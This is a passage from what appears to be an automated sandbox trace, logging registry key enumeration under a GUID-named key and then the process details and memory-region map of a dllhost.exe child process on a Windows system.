hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.732] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x70) returned 0x0 [0266.732] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1b, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.732] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.732] _errno () returned 0x4a5bed55a0 [0266.732] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-33", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.732] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.732] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1c, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.732] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.732] _errno () returned 0x4a5bed55a0 [0266.733] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-34", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.733] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0266.733] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1d, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.733] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.733] _errno () returned 0x4a5bed55a0 [0266.733] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-35", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.733] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0266.733] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1e, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.733] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.733] _errno () returned 0x4a5bed55a0 [0266.733] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-36", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.733] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0266.734] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1f, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.734] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.734] _errno () returned 0x4a5bed55a0 [0266.734] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-37", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.734] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x80) returned 0x0 [0266.734] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x20, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-38", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.734] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.734] _errno () returned 0x4a5bed55a0 [0266.734] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-38", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.734] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x80) returned 0x0 [0266.734] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x21, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-39", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.734] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.735] _errno () returned 0x4a5bed55a0 [0266.735] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-39", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.735] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x60) returned 0x0 [0266.735] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x22, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.735] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.735] _errno () returned 0x4a5bed55a0 [0266.735] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-4", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.735] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0xa0) returned 0x0 [0266.735] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x23, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-40", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.735] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.735] _errno () returned 0x4a5bed55a0 [0266.736] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-40", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.736] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.736] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x24, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-41", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.736] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.736] _errno () returned 0x4a5bed55a0 [0266.736] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-41", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.736] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.736] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x25, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-42", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.736] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.736] _errno () returned 0x4a5bed55a0 [0266.736] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-42", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.736] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.737] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x26, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-43", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.737] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.737] _errno () returned 0x4a5bed55a0 [0266.737] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-43", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.737] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0266.737] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x27, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.737] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.737] _errno () returned 0x4a5bed55a0 [0266.737] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-5", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.737] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0266.737] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x28, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.737] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.738] _errno () returned 0x4a5bed55a0 [0266.738] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-6", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.738] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.738] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x29, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.738] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.738] _errno () returned 0x4a5bed55a0 [0266.738] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-7", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.738] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0266.738] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x2a, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.738] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.738] _errno () returned 0x4a5bed55a0 [0266.739] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-8", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.739] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0266.739] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x2b, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.739] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.739] _errno () returned 0x4a5bed55a0 [0266.739] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.739] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.739] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x2c, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-9", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 Thread: id = 766 os_tid = 0xf78 Process: id = "78" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x198a7000" os_pid = "0x938" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x240" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4139 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4140 start_va = 0xf303b00000 end_va = 0xf303b0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f303b00000" filename = "" Region: id = 4141 start_va = 0xf303b10000 end_va = 0xf303b16fff entry_point = 0x0 region_type = private name = "private_0x000000f303b10000" filename = "" Region: id = 4142 start_va = 0xf303b20000 end_va = 0xf303b33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f303b20000" filename = "" Region: id = 4143 start_va = 0xf303b40000 end_va = 0xf303c3ffff entry_point = 0x0 region_type = private name = "private_0x000000f303b40000" filename = "" Region: id = 4144 start_va = 0xf303c40000 end_va = 0xf303c43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f303c40000" filename = "" Region: id = 4145 start_va = 0xf303c50000 end_va = 0xf303c51fff entry_point = 0x0 region_type = private name = "private_0x000000f303c50000" filename = "" Region: id = 4146 start_va = 0xf303c60000 end_va = 0xf303d5ffff entry_point = 0x0 region_type = private name = "private_0x000000f303c60000" filename = "" Region: id = 4147 start_va = 0xf303d60000 end_va = 0xf303e1dfff entry_point = 0xf303d60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4148 start_va = 0xf303e20000 end_va = 0xf303f1ffff entry_point = 0x0 region_type = private name = "private_0x000000f303e20000" filename = "" Region: id = 4149 start_va = 0xf303f20000 end_va = 0xf303f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f303f20000" filename = "" Region: id = 4150 start_va = 0xf303f30000 end_va = 0xf303f36fff entry_point = 0x0 region_type = private name = "private_0x000000f303f30000" filename = "" Region: id = 4151 start_va = 0xf303f40000 end_va = 0xf303f40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f303f40000" filename = "" Region: id = 4152 start_va = 0xf303f50000 end_va = 0xf30404ffff entry_point = 0x0 region_type = private name = "private_0x000000f303f50000" filename = "" Region: id = 4153 start_va = 0xf304050000 end_va = 0xf304050fff entry_point = 0x0 region_type = private name = "private_0x000000f304050000" filename = "" Region: id = 4154 start_va = 0xf304060000 end_va = 0xf304060fff entry_point = 0x0 region_type = private name = "private_0x000000f304060000" filename = "" Region: id = 4155 start_va = 0xf304070000 end_va = 0xf304072fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f304070000" filename = "" Region: id = 4156 start_va = 0xf304090000 end_va = 0xf304091fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f304090000" filename = "" Region: id = 4157 start_va = 0xf304100000 end_va = 0xf30410ffff entry_point = 0x0 region_type = private name = "private_0x000000f304100000" filename = "" Region: id = 4158 start_va = 0xf304110000 end_va = 0xf30411ffff entry_point = 0x0 region_type = private name = "private_0x000000f304110000" filename = "" Region: id = 4159 start_va = 0xf304120000 end_va = 0xf304456fff entry_point = 0xf304120000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4160 start_va = 0xf304460000 end_va = 0xf30455ffff entry_point = 0x0 region_type = private name = "private_0x000000f304460000" filename = "" Region: id = 4161 start_va = 0xf304560000 end_va = 0xf30465ffff entry_point = 0x0 region_type = private name = "private_0x000000f304560000" filename = "" Region: id = 4162 start_va = 0xf304660000 end_va = 0xf30475ffff entry_point = 0x0 region_type = private name = "private_0x000000f304660000" filename = "" Region: id = 4163 start_va = 0xf304760000 end_va = 0xf3048e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f304760000" filename = "" Region: id = 4164 start_va = 0xf3048f0000 end_va = 0xf304a70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3048f0000" filename = "" Region: id = 4165 start_va = 0xf304a80000 end_va = 0xf305e7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f304a80000" filename = "" Region: id = 4166 start_va = 0xf305e80000 end_va = 0xf305f7ffff entry_point = 0x0 region_type = private name = "private_0x000000f305e80000" filename = "" Region: id = 4167 start_va = 0x7df5ff820000 end_va = 0x7ff5ff81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff820000" filename = "" Region: id = 4168 start_va = 0x7ff63d80e000 end_va = 0x7ff63d80ffff entry_point = 0x0 region_type = private name = "private_0x00007ff63d80e000" filename = "" Region: id = 4169 start_va = 0x7ff63d810000 end_va = 0x7ff63d90ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff63d810000" filename = "" Region: id = 4170 start_va = 0x7ff63d910000 end_va = 0x7ff63d932fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff63d910000" filename = "" Region: id = 4171 start_va = 0x7ff63d933000 end_va = 0x7ff63d934fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d933000" filename = "" Region: id = 4172 start_va = 0x7ff63d935000 end_va = 0x7ff63d936fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d935000" filename = "" Region: id = 4173 start_va = 0x7ff63d937000 end_va = 0x7ff63d938fff entry_point = 0x0 region_type = private name = "private_0x00007ff63d937000" filename = "" Region: id = 4174 start_va = 0x7ff63d939000 end_va = 0x7ff63d93afff entry_point = 0x0 region_type = private name = "private_0x00007ff63d939000" filename = "" Region: id = 4175 start_va = 0x7ff63d93b000 end_va = 0x7ff63d93bfff entry_point = 0x0 region_type = private name = "private_0x00007ff63d93b000" filename = "" Region: id = 4176 start_va = 0x7ff63d93c000 end_va = 0x7ff63d93dfff entry_point = 0x0 region_type = private name = "private_0x00007ff63d93c000" filename = "" Region: id = 4177 start_va = 0x7ff63d93e000 end_va = 0x7ff63d93ffff entry_point = 0x0 region_type = private name = "private_0x00007ff63d93e000" filename = "" Region: id = 4178 start_va = 0x7ff63dbd0000 end_va = 0x7ff63dbd6fff entry_point = 0x7ff63dbd0000 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 4179 start_va = 0x7ffae6ef0000 end_va = 0x7ffae6f3afff entry_point = 0x7ffae6ef0000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 4180 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = 